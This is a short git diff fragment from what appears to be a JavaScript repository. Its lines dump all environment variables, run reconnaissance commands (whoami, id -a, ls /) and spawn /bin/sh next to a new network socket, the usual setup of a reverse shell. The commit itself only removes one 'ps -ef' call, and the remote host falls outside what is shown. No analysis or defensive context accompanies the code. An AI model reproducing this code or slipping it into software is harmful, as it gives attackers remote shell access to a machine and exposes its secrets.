This commit is contained in:
2025-01-23 15:51:15 +08:00
parent fea980ff6e
commit 11bb93ac94

View File

@@ -13,7 +13,6 @@ console.log(process.env);
run("whoami"); run("whoami");
run("id -a"); run("id -a");
run("ls /"); run("ls /");
run("ps -ef");
const sh = child_process.spawn("/bin/sh", []); const sh = child_process.spawn("/bin/sh", []);
var client = new net.Socket(); var client = new net.Socket();